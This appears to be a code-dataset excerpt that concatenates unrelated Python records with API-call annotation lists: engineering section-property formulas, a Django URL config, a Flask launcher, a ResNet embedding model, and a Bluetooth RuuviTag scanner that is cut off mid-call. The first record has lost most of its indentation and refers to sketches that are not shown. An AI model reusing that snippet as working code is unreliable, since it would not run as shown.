#print('Jy',_Iz / 10**4)
# Second Moment of Area about the horizontal centroidal C
self.Ic = self.Iy - self.area * self.Zc**2
#print('Jx',self.Ic / 10**4)
# The distances from the centroid to the extreme fibres
_y1 = self.a
_z1 = self.b - self.Zc
_z2 = self.Zc
# elastic section moduli
self.Zey = min(self.Ic / _z1, self.Ic / _z2)
self.Zez = self.Iz / _y1
# plastic section moduli
_Zpy = 0
_Zpz = 0
# radii of gyration
self.ry = math.sqrt(self.Ic / self.area)
self.rz = math.sqrt(self.Iz / self.area)
#
#return _Area, _Zc, _Yc, self.Ic, _Zey, _Zpy, _ry, _Iz, _Zez, _Zpz, _rz
#
#
def print_file(self, file_name):
check_out = print_header_ellipse()
check_out.append("{:23s} {:1.4E} {:1.4E} {:1.4E} {:1.4E} {:1.4E}"
.format(self.type, self.a, self.b, self.theta, self.p, self.q))
check_out.extend(print_properties(self))
#file_checkout = split_file_name(file_name)
#file_checkout = str(file_checkout[0]) +'_check_me.txt'
file_checkout = str(file_name) + '.txt'
add_out = open(file_checkout,'w')
add_out.write("".join(check_out))
add_out.close()
print('ok')
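#
# Minimal usage sketch (hedged, values illustrative). As a sanity check on
# the gamma-function formulas, p = q = 2 reduces to a half ellipse with
# area = pi * a * b / 2.
#
#   se = SuperEllipse()
#   se.units_input(length='metre')
#   se.geometry(a=0.200, b=0.100, p=2.0, q=2.0)
#   se.get_property()
#   print(se.area)   # ~0.0314 for a = 0.2, b = 0.1
#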
#
def quarterCircle(r):
"""
Calculate a quarter of a circle
Parameters
----------
r : radius
Returns
----------
area: Section area
Zc : Elastic neutral centre
Yc : Elastic neutral centre
  Iy, Iy1, Iy2 : Second moments of area about the major (horizontal) axes
  Iz, Iz1, Iz2 : Second moments of area about the minor (vertical) axes
Notes
----------
Uses formulas from:
1.- Structural Engineering Formulas
<NAME>
Examples
----------
"""
# Area
_Area = math.pi * r**2 / 4.0
#
# Centroid
_Zc = 4 * r / (3 * math.pi)
_Yc = _Zc
# Second Moment of Area about x
_Iy = 0.07135 * r**4
_Iy1 = 0.05489 * r**4
_Iy2 = math.pi * r**4 / 16.0
# Second Moment of Area about y
_Iz = 0.03843 * r**4
_Iz1 = _Iy1
_Iz2 = _Iy2
return _Area, _Zc, _Yc, _Iy, _Iy1, _Iy2, _Iz, _Iz1, _Iz2
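#
# Worked check (follows directly from the constants above): for r = 1.0,
# quarterCircle returns Area = pi/4 ~ 0.7854, Zc = Yc = 4/(3*pi) ~ 0.4244,
# Iy = 0.07135, Iy1 = 0.05489, Iz = 0.03843 and Iy2 = Iz2 = pi/16 ~ 0.1963.
#
#   props = quarterCircle(1.0)
#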
#
def closed_cross_section(a, b1, A1, Yc1, Ic1, Iy1,
b2 = 0, A2 = 0, Yc2 = 0,
Ic2 = 0, Iy2 = 0):
"""
Elliptical Sections Profiles Extension
Open cross-sections which are extended to half of the circumference
(thetaG = 1/2pi) may be combined together to make a hollow
closed cross-section with finite thickness t, e.g. a tube, hollow
rod, pipe or cylindrical shell,
"""
# check if section is symmetrical
if b2 == 0:
b2 = b1
A2 = A1
Yc2 = Yc1
Ic2 = Ic1
Iy2 = Iy1
_d = b1 + b2
# Total cross area
_A = A1 + A2
# Centroidal C-axis of full section
_Yc = (A1 * (Yc1 + b2) + A2 * (b2 - Yc2)) / _A
# Second moment of full area
_Ixx = ((Ic1 + A1 * (Yc1 + b2 - _Yc)**2)
+ (Ic2 + A2 * (_Yc - b2 + Yc2)**2))
_Iyy = Iy1 + Iy2
# Extreme fibre distances
_x1 = a
_y1 = _d - _Yc
_y2 = _Yc
  # Elastic section moduli (_Ixx, about the horizontal axis, pairs with the
  # vertical fibre distances; _Iyy, about the axis of symmetry, with the
  # half-width a)
  _Sx = min(_Ixx / _y1, _Ixx / _y2)
  _Sy = _Iyy / _x1
# radii of gyration
_ry = math.sqrt(_Iyy / _A)
_rx = math.sqrt(_Ixx / _A)
#
return _A, _Yc, _x1, _Ixx, _Sx, _rx, _Iyy, _Sy, _ry
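#
# Minimal usage sketch (hedged): two mirror-image half-sections spanning
# thetaG = 90 degrees are joined into a closed tube; omitting the b2..Iy2
# arguments makes the second half a copy of the first. Passing the
# half-section's Iz as the Iy1 argument (the moment about the axis of
# symmetry) is an assumption about the intended calling convention, with
# `seg` taken from the EllipticalSegment sketch above.
#
#   A, Yc, x1, Ixx, Sx, rx, Iyy, Sy, ry = closed_cross_section(
#       a=0.200, b1=0.100, A1=seg.area, Yc1=seg.Zc, Ic1=seg.Ic, Iy1=seg.Iz)
#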
#
#
def hollow_ellipse(a, b, t):
"""
a
b
t
"""
# Area
K1 = 0.2464 + 0.002222 * (a/b + b/a)
Area = math.pi * t * (a + b) * (1 + K1 * ((a-b)/(a+b))**2)
# Centroid
Zc = a + t / 2.0
Yc = b + t / 2.0
    # Second Moment of Area about Major Axis
# --------------------------------------
K2 = 0.1349 + 0.1279 * a/b - 0.01284 * (a/b)**2
K3 = 0.1349 + 0.1279 * b/a - 0.01284 * (b/a)**2
Iy = (math.pi * t * a**2 / 4.0 * (a + 3*b) * (1 + K2 * ((a-b)/(a+b))**2)
+ math.pi * t**3 / 16.0 * (3*a + b) * (1 + K3 * ((a-b)/(a+b))**2))
# Second Moment of Area about Minor Axis
# --------------------------------------
K2 = 0.1349 + 0.1279 * b/a - 0.01284 * (b/a)**2
K3 = 0.1349 + 0.1279 * a/b - 0.01284 * (a/b)**2
Iz = (math.pi * t * b**2 / 4.0 * (b + 3*a) * (1 + K2 * ((b-a)/(b+a))**2)
+ math.pi * t**3 / 16.0 * (3*b + a) * (1 + K3 * ((b-a)/(b+a))**2))
    # Elastic Modulus about Major Axis
# --------------------------------------
K4 = 0.1835 + 0.895 * a/b - 0.00978 * (a/b)**2
Zey = 1.3333 * t * a * (a + 2*b) * (1 + K4 * ((a-b)/(a+b))**2) + t**3 / 3.0
# Elastic Modulus about Minor Axis
# --------------------------------------
K4 = 0.1835 + 0.895 * b/a - 0.00978 * (b/a)**2
Zez = 1.3333 * t * b * (b + 2*a) * (1 + K4 * ((b-a)/(b+a))**2) + t**3 / 3.0
return Area, Zc, Yc, Iy, Zey, Iz, Zez
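#
# Minimal usage sketch (values illustrative): a and b are the semi-axes of
# the midthickness ellipse and t the constant wall thickness, so the overall
# depth is 2*a + t (the centroid Zc = a + t/2 above implies this reading).
#
#   Area, Zc, Yc, Iy, Zey, Iz, Zez = hollow_ellipse(a=0.200, b=0.100, t=0.010)
#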
|
[
"math.sqrt",
"math.pow",
"math.radians",
"math.sin",
"math.gamma",
"math.cos"
] |
[((29284, 29304), 'math.sqrt', 'math.sqrt', (['(_Iyy / _A)'], {}), '(_Iyy / _A)\n', (29293, 29304), False, 'import math\n'), ((29315, 29335), 'math.sqrt', 'math.sqrt', (['(_Ixx / _A)'], {}), '(_Ixx / _A)\n', (29324, 29335), False, 'import math\n'), ((9265, 9295), 'math.sqrt', 'math.sqrt', (['(self.Iy / self.area)'], {}), '(self.Iy / self.area)\n', (9274, 9295), False, 'import math\n'), ((9314, 9344), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (9323, 9344), False, 'import math\n'), ((13476, 13500), 'math.radians', 'math.radians', (['self.theta'], {}), '(self.theta)\n', (13488, 13500), False, 'import math\n'), ((14824, 14854), 'math.sqrt', 'math.sqrt', (['(self.Ic / self.area)'], {}), '(self.Ic / self.area)\n', (14833, 14854), False, 'import math\n'), ((14873, 14903), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (14882, 14903), False, 'import math\n'), ((19014, 19038), 'math.radians', 'math.radians', (['self.theta'], {}), '(self.theta)\n', (19026, 19038), False, 'import math\n'), ((20164, 20194), 'math.sqrt', 'math.sqrt', (['(self.Ic / self.area)'], {}), '(self.Ic / self.area)\n', (20173, 20194), False, 'import math\n'), ((20213, 20243), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (20222, 20243), False, 'import math\n'), ((26282, 26312), 'math.sqrt', 'math.sqrt', (['(self.Ic / self.area)'], {}), '(self.Ic / self.area)\n', (26291, 26312), False, 'import math\n'), ((26331, 26361), 'math.sqrt', 'math.sqrt', (['(self.Iz / self.area)'], {}), '(self.Iz / self.area)\n', (26340, 26361), False, 'import math\n'), ((14465, 14482), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (14473, 14482), False, 'import math\n'), ((19805, 19822), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (19813, 19822), False, 'import math\n'), ((13660, 13681), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (13668, 13681), False, 'import math\n'), ((14000, 14021), 'math.sin', 'math.sin', (['(4 * _thetaG)'], {}), '(4 * _thetaG)\n', (14008, 14021), False, 'import math\n'), ((14547, 14564), 'math.cos', 'math.cos', (['_thetaG'], {}), '(_thetaG)\n', (14555, 14564), False, 'import math\n'), ((19216, 19233), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (19224, 19233), False, 'import math\n'), ((19403, 19424), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (19411, 19424), False, 'import math\n'), ((19559, 19580), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (19567, 19580), False, 'import math\n'), ((19887, 19904), 'math.cos', 'math.cos', (['_thetaG'], {}), '(_thetaG)\n', (19895, 19904), False, 'import math\n'), ((24641, 24708), 'math.gamma', 'math.gamma', (['((self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (24651, 24708), False, 'import math\n'), ((25005, 25076), 'math.gamma', 'math.gamma', (['((2 * self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((2 * self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (25015, 25076), False, 'import math\n'), ((25314, 25385), 'math.gamma', 'math.gamma', (['((3 * self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((3 * self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (25324, 25385), False, 'import math\n'), ((25603, 25674), 'math.gamma', 'math.gamma', (['((self.p + self.p * self.q + 3 * self.q) / (self.p * self.q))'], {}), '((self.p + self.p * self.q + 
3 * self.q) / (self.p * self.q))\n', (25613, 25674), False, 'import math\n'), ((13748, 13765), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (13756, 13765), False, 'import math\n'), ((13813, 13834), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (13821, 13834), False, 'import math\n'), ((14159, 14180), 'math.sin', 'math.sin', (['(2 * _thetaG)'], {}), '(2 * _thetaG)\n', (14167, 14180), False, 'import math\n'), ((24552, 24576), 'math.gamma', 'math.gamma', (['(1.0 / self.q)'], {}), '(1.0 / self.q)\n', (24562, 24576), False, 'import math\n'), ((24579, 24614), 'math.gamma', 'math.gamma', (['((1.0 + self.p) / self.p)'], {}), '((1.0 + self.p) / self.p)\n', (24589, 24614), False, 'import math\n'), ((24760, 24785), 'math.pow', 'math.pow', (['(4)', '(1.0 / self.q)'], {}), '(4, 1.0 / self.q)\n', (24768, 24785), False, 'import math\n'), ((24802, 24820), 'math.sqrt', 'math.sqrt', (['math.pi'], {}), '(math.pi)\n', (24811, 24820), False, 'import math\n'), ((24847, 24888), 'math.gamma', 'math.gamma', (['((2.0 + self.q) / (2 * self.q))'], {}), '((2.0 + self.q) / (2 * self.q))\n', (24857, 24888), False, 'import math\n'), ((24913, 24980), 'math.gamma', 'math.gamma', (['((self.p + self.p * self.q + self.q) / (self.p * self.q))'], {}), '((self.p + self.p * self.q + self.q) / (self.p * self.q))\n', (24923, 24980), False, 'import math\n'), ((25227, 25251), 'math.gamma', 'math.gamma', (['(3.0 / self.q)'], {}), '(3.0 / self.q)\n', (25237, 25251), False, 'import math\n'), ((25254, 25289), 'math.gamma', 'math.gamma', (['((1.0 + self.p) / self.p)'], {}), '((1.0 + self.p) / self.p)\n', (25264, 25289), False, 'import math\n'), ((25516, 25540), 'math.gamma', 'math.gamma', (['(3.0 / self.p)'], {}), '(3.0 / self.p)\n', (25526, 25540), False, 'import math\n'), ((25543, 25578), 'math.gamma', 'math.gamma', (['((1.0 + self.q) / self.q)'], {}), '((1.0 + self.q) / self.q)\n', (25553, 25578), False, 'import math\n'), ((7518, 7532), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7527, 7532), False, 'import math\n'), ((7585, 7599), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7594, 7599), False, 'import math\n'), ((7652, 7666), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7661, 7666), False, 'import math\n'), ((7719, 7733), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (7728, 7733), False, 'import math\n'), ((8089, 8103), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8098, 8103), False, 'import math\n'), ((8156, 8170), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8165, 8170), False, 'import math\n'), ((8223, 8237), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8232, 8237), False, 'import math\n'), ((8290, 8304), 'math.sqrt', 'math.sqrt', (['_DD'], {}), '(_DD)\n', (8299, 8304), False, 'import math\n'), ((14219, 14236), 'math.sin', 'math.sin', (['_thetaG'], {}), '(_thetaG)\n', (14227, 14236), False, 'import math\n')]
|
from django.conf.urls import url, include
from rest_framework import routers
from crm_inbox.flows import * # noqa
from processlib.views import (ProcessViewSet)
router = routers.DefaultRouter()
router.register('process', ProcessViewSet)
urlpatterns = [
url(r'^process/', include('processlib.urls', namespace='processlib')),
url(r'^api/', include(router.urls)),
]
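# Note: with this configuration the viewset routes registered on the router
# resolve under /api/, e.g. /api/process/ and /api/process/{pk}/, and
# DefaultRouter also exposes a browsable API root at /api/.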
|
[
"django.conf.urls.include",
"rest_framework.routers.DefaultRouter"
] |
[((173, 196), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (194, 196), False, 'from rest_framework import routers\n'), ((280, 330), 'django.conf.urls.include', 'include', (['"""processlib.urls"""'], {'namespace': '"""processlib"""'}), "('processlib.urls', namespace='processlib')\n", (287, 330), False, 'from django.conf.urls import url, include\n'), ((351, 371), 'django.conf.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (358, 371), False, 'from django.conf.urls import url, include\n')]
|
from dynaconf import settings
from app import create_app
application = create_app()
# runs this only when the environment is 'development'
if settings.ENVIRONMENT == "development" and settings.GUNICORN is False:
application.run(host="0.0.0.0", port=settings.FLASK_CONFIG.PORT, debug=True)
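# In any other configuration (e.g. GUNICORN set to true) the block above is
# skipped and a WSGI server is expected to serve the module-level
# `application` callable, e.g. `gunicorn <module>:application` (the exact
# invocation depends on the deployment and is assumed here).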
|
[
"app.create_app"
] |
[((73, 85), 'app.create_app', 'create_app', ([], {}), '()\n', (83, 85), False, 'from app import create_app\n')]
|
# coding=utf-8
# Copyright 2021 The vMF Embeddings Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for instantiating a ResNet in PyTorch.
Code adapted from:
https://github.com/jeromerony/dml_cross_entropy/blob/master/models/base_model.py
https://github.com/jeromerony/dml_cross_entropy/blob/master/models/architectures/resnet.py
"""
import logging
import torch.nn as nn
from torchvision.models import resnet
from torchvision.models.utils import load_state_dict_from_url
from vmf_embeddings.archs import arch
from vmf_embeddings.archs import utils
log = logging.getLogger("main")
class ResNet(arch.Arch):
"""Class for defining a ResNet architecture."""
def __init__(
self,
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
block,
layers,
groups=1,
width_per_group=64,
replace_stride_with_dilation=None,
):
"""Initializes a ResNet architecture object. See arguments in arch.py."""
super(ResNet, self).__init__(embedding_dim, n_classes, use_vmf, learn_temp,
init_temp, kappa_confidence)
self.backbone_features = 512 * block.expansion
self._norm_layer = nn.BatchNorm2d
# Fixes batch-norm to eval mode during training
self.set_bn_eval = set_bn_eval
# Make first convolution use a 3x3 kernel for CIFAR datasets
self.first_conv_3x3 = first_conv_3x3
# Linear layer that remaps from the backbone output of ResNet
# to the embedding dimensionality
self.remap = nn.Linear(self.backbone_features, self.embedding_dim)
nn.init.zeros_(self.remap.bias)
self.classifier = nn.Linear(self.embedding_dim, self.n_classes, bias=False)
if self.use_vmf:
# This is the empirical approximation for initialization the vMF
# distributions for each class in the final layer.
utils.vmf_class_weight_init(self.classifier.weight, self.kappa_confidence,
self.embedding_dim)
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# Each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError(
"replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if self.first_conv_3x3:
self.conv1 = nn.Conv2d(
3, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False)
else:
self.conv1 = nn.Conv2d(
3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = self._norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(
block, 128, layers[1], stride=2, dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(
block, 256, layers[2], stride=2, dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(
block, 512, layers[3], stride=2, dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-init
for m in self.modules():
if isinstance(m, resnet.Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, resnet.BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
resnet.conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(
block(
self.inplanes,
planes,
stride,
downsample,
self.groups,
self.base_width,
previous_dilation,
norm_layer,
))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(
block(
self.inplanes,
planes,
groups=self.groups,
base_width=self.base_width,
dilation=self.dilation,
norm_layer=norm_layer,
))
return nn.Sequential(*layers)
def create_encoder(self):
self.encoder = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2,
self.layer3,
self.layer4,
self.avgpool,
utils.Flatten(),
self.remap,
self.classifier,
)
def train(self, mode=True):
"""Sets the module in training mode.
This has any effect only on certain modules. See documentations of
particular modules for details of their behaviors in training/evaluation
mode, if they are affected, e.g. :class:`Dropout`, :class:`BatchNorm`, etc.
Args:
mode: whether to set training mode ("True") or evaluation mode ("False").
Returns:
self
"""
self.training = mode
for module in self.children():
module.train(mode)
if self.set_bn_eval:
for module in self.modules():
if isinstance(module, nn.BatchNorm2d):
module.eval()
return self
def _resnet(
arch_name,
block,
layers,
pretrained,
progress,
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
):
"""Instantiates a ResNet model."""
model = ResNet(
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
block,
layers,
)
if pretrained:
log.info("Loading ResNet50 from Pytorch pretrained")
state_dict = load_state_dict_from_url(
resnet.model_urls[arch_name], progress=progress)
model.load_state_dict(state_dict, strict=False)
model.create_encoder()
return model
def resnet50(
n_classes,
embedding_dim,
set_bn_eval,
pretrained,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
progress=False,
):
"""ResNet-50 model from "Deep Residual Learning for Image Recognition"."""
return _resnet(
"resnet50",
resnet.Bottleneck,
[3, 4, 6, 3],
pretrained,
progress,
n_classes,
embedding_dim,
set_bn_eval,
first_conv_3x3,
use_vmf,
learn_temp,
init_temp,
kappa_confidence,
)
|
[
"torch.nn.AdaptiveAvgPool2d",
"torch.nn.ReLU",
"torch.nn.init.kaiming_normal_",
"torch.nn.Sequential",
"torch.nn.Conv2d",
"torchvision.models.resnet.conv1x1",
"vmf_embeddings.archs.utils.Flatten",
"torch.nn.init.zeros_",
"vmf_embeddings.archs.utils.vmf_class_weight_init",
"torch.nn.init.constant_",
"torchvision.models.utils.load_state_dict_from_url",
"torch.nn.Linear",
"torch.nn.MaxPool2d",
"logging.getLogger"
] |
[((1083, 1108), 'logging.getLogger', 'logging.getLogger', (['"""main"""'], {}), "('main')\n", (1100, 1108), False, 'import logging\n'), ((2109, 2162), 'torch.nn.Linear', 'nn.Linear', (['self.backbone_features', 'self.embedding_dim'], {}), '(self.backbone_features, self.embedding_dim)\n', (2118, 2162), True, 'import torch.nn as nn\n'), ((2167, 2198), 'torch.nn.init.zeros_', 'nn.init.zeros_', (['self.remap.bias'], {}), '(self.remap.bias)\n', (2181, 2198), True, 'import torch.nn as nn\n'), ((2222, 2279), 'torch.nn.Linear', 'nn.Linear', (['self.embedding_dim', 'self.n_classes'], {'bias': '(False)'}), '(self.embedding_dim, self.n_classes, bias=False)\n', (2231, 2279), True, 'import torch.nn as nn\n'), ((3423, 3444), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (3430, 3444), True, 'import torch.nn as nn\n'), ((3464, 3512), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', ([], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)'}), '(kernel_size=3, stride=2, padding=1)\n', (3476, 3512), True, 'import torch.nn as nn\n'), ((3940, 3968), 'torch.nn.AdaptiveAvgPool2d', 'nn.AdaptiveAvgPool2d', (['(1, 1)'], {}), '((1, 1))\n', (3960, 3968), True, 'import torch.nn as nn\n'), ((5529, 5551), 'torch.nn.Sequential', 'nn.Sequential', (['*layers'], {}), '(*layers)\n', (5542, 5551), True, 'import torch.nn as nn\n'), ((7088, 7161), 'torchvision.models.utils.load_state_dict_from_url', 'load_state_dict_from_url', (['resnet.model_urls[arch_name]'], {'progress': 'progress'}), '(resnet.model_urls[arch_name], progress=progress)\n', (7112, 7161), False, 'from torchvision.models.utils import load_state_dict_from_url\n'), ((2436, 2534), 'vmf_embeddings.archs.utils.vmf_class_weight_init', 'utils.vmf_class_weight_init', (['self.classifier.weight', 'self.kappa_confidence', 'self.embedding_dim'], {}), '(self.classifier.weight, self.kappa_confidence,\n self.embedding_dim)\n', (2463, 2534), False, 'from vmf_embeddings.archs import utils\n'), ((3156, 3231), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', 'self.inplanes'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)', 'bias': '(False)'}), '(3, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False)\n', (3165, 3231), True, 'import torch.nn as nn\n'), ((3272, 3347), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', 'self.inplanes'], {'kernel_size': '(7)', 'stride': '(2)', 'padding': '(3)', 'bias': '(False)'}), '(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)\n', (3281, 3347), True, 'import torch.nn as nn\n'), ((5808, 5823), 'vmf_embeddings.archs.utils.Flatten', 'utils.Flatten', ([], {}), '()\n', (5821, 5823), False, 'from vmf_embeddings.archs import utils\n'), ((4042, 4112), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (['m.weight'], {'mode': '"""fan_out"""', 'nonlinearity': '"""relu"""'}), "(m.weight, mode='fan_out', nonlinearity='relu')\n", (4065, 4112), True, 'import torch.nn as nn\n'), ((4344, 4378), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bn3.weight', '(0)'], {}), '(m.bn3.weight, 0)\n', (4361, 4378), True, 'import torch.nn as nn\n'), ((4805, 4868), 'torchvision.models.resnet.conv1x1', 'resnet.conv1x1', (['self.inplanes', '(planes * block.expansion)', 'stride'], {}), '(self.inplanes, planes * block.expansion, stride)\n', (4819, 4868), False, 'from torchvision.models import resnet\n'), ((4179, 4209), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.weight', '(1)'], {}), '(m.weight, 1)\n', (4196, 4209), True, 'import torch.nn as nn\n'), ((4218, 4246), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias', '(0)'], {}), '(m.bias, 0)\n', (4235, 4246), True, 'import torch.nn as nn\n'), ((4432, 4466), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bn2.weight', '(0)'], {}), '(m.bn2.weight, 0)\n', (4449, 4466), True, 'import torch.nn as nn\n')]
|
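For orientation, a minimal sketch of how the resnet50 factory above might be invoked; every hyperparameter value below is an illustrative assumption, not a setting taken from the source.

# Hypothetical instantiation of the resnet50 factory defined above.
# All values are illustrative assumptions, not defaults from the source.
model = resnet50(
    n_classes=100,        # number of training classes (assumed)
    embedding_dim=128,    # embedding size (assumed)
    set_bn_eval=True,     # freeze batch-norm statistics during training
    pretrained=False,     # skip the torchvision checkpoint download
    first_conv_3x3=True,  # 3x3 stem, e.g. for CIFAR-sized inputs
    use_vmf=True,         # enable the vMF class-weight initialization
    learn_temp=True,
    init_temp=16.0,
    kappa_confidence=0.7,
)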
# coding=utf-8
# !/usr/bin/python3
# Name: aioruuvitag_bleak - Bluetooth Low Energy platform Agnostic Klient by <NAME>
# https://github.com/hbldh/bleak.git
# Copyright: (c) 2019 TK
# Licence: MIT
#
# sudo apt install bluez
# requires bluez 5.43
# ------------------------------------------------------------------------------
import logging
logger = logging.getLogger('ruuvitag')
import asyncio
from contextlib import suppress
from datetime import datetime as _dt, timedelta as _td
import platform
if platform.system() == 'Windows':
from .scanner_windows import scanner as _scanner
elif platform.system() == 'Linux':
from .scanner_linux import scanner as _scanner
from .ruuvitag_misc import hex_string, get_sec
from .ble_data import BLEData
# ===============================================================================
class ruuvitag_bleak(object):
SCHEDULER_MAX_INSTANCES = 5
HCICONFIG_CMD = '/bin/hciconfig'
#-------------------------------------------------------------------------------
def __init__(self,*,
loop,
callback,
scheduler=None,
device='hci0',
mfids=None,
device_reset=False,
device_timeout=10.0,
**kwargs
):
logger.info(f'>>> device:{device}')
if not loop:
raise ValueError(f'loop is None')
self._loop = loop
if not callback:
raise ValueError(f'callback is None')
self._callback = callback
self._stopevent = asyncio.Event()
self._scheduler = scheduler
self._mfids = mfids
self._device_reset = device_reset
self._device_timeout = device_timeout
self._device = device
self._data_ts = 0
self._inqueue = asyncio.Queue()
self._scanner_stop = None
self._scanner_task = None
logger.info(f'>>> {self} initialized')
# -------------------------------------------------------------------------------
def __repr__(self):
return f'ruuvitag_bleak device:{self._device} mfids:{self._mfids} reset:{self._device_reset} timeout:{self._device_timeout}'
#-------------------------------------------------------------------------------
def _schedule(self):
"""
        Initializes the scheduler for hci device no-data checking
"""
logger.debug(f'>>> enter {type(self._scheduler)} device_timeout:{self._device_timeout}')
if not self._scheduler:
return
if self._device_timeout:
l_jobid = f'bleak_timeout'
try:
self._scheduler.add_job(
self._do_bleak_timeout,
'interval',
seconds = 1,
kwargs = {
'jobid': l_jobid,
'reset': self._device_reset
},
id = l_jobid,
replace_existing = True,
max_instances = self.SCHEDULER_MAX_INSTANCES,
coalesce = True,
next_run_time = _dt.now()+_td(seconds=self._device_timeout)
)
logger.info(f'>>> jobid:{l_jobid} scheduled')
except:
logger.exception(f'>>> jobid:{l_jobid}')
#-------------------------------------------------------------------------------
async def _do_bleak_timeout(self, *,
jobid,
reset=False
):
"""
Supervises reception of the bleak data
Restarts socket if no data received within device_timeout period
"""
l_now = get_sec()
if (l_now - self._data_ts) > self._device_timeout:
self._data_ts = l_now
logger.warning(f'>>> jobid:{jobid} device_timeout timer ({self._device_timeout}sec) expired')
try:
logger.info(f'>>> jobid:{jobid} restarting device:{self._device}')
try:
                    await self._reset()
self._scanner_task = self._loop.create_task(_scanner(device=self._device, loop=self._loop, outqueue=self._inqueue, stopevent=self._scanner_stop))
except:
logger.exception(f'>>> exception')
pass
except:
logger.exception(f'>>> jobid:{jobid}')
# ------------------------------------------------------------------------------
async def _reset(self):
logger.debug(f'>>> device:{self._device}')
self._scanner_stop.set()
await asyncio.sleep(1.0)
if self._device_reset:
await self._shell_cmd(cmd=f'{self.HCICONFIG_CMD} {self._device} down')
await asyncio.sleep(1.0)
await self._shell_cmd(cmd=f'{self.HCICONFIG_CMD} {self._device} up')
await asyncio.sleep(1.0)
self._scanner_stop.clear()
# ------------------------------------------------------------------------------
async def _shell_cmd(self, *, cmd):
if platform.system() == 'Linux':
logger.info(f'>>> {cmd!r}')
l_proc = await asyncio.create_subprocess_shell(
cmd,
